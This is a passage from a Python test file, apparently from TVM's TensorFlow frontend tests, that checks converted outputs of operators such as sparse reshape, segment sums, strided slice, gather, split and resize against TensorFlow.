np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
""" sparse_reshape op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
if default_value == None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
""" One iteration of tf.sparse.add """
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
# TODO(ANSHUMAN87): support user input threashold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
""" sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
""" One iteration of a Stridedslice """
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, dtype):
""" One iteration of a GatherV2 """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, "int32")
_test_gather((4,), (1,), 1, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, "float32")
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
def check_bias_add(lh_shpae, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shpae).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
""" One iteration of a Split """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
""" One iteration of resize bilinear """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
""" One iteration of resize nearest neighbor """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
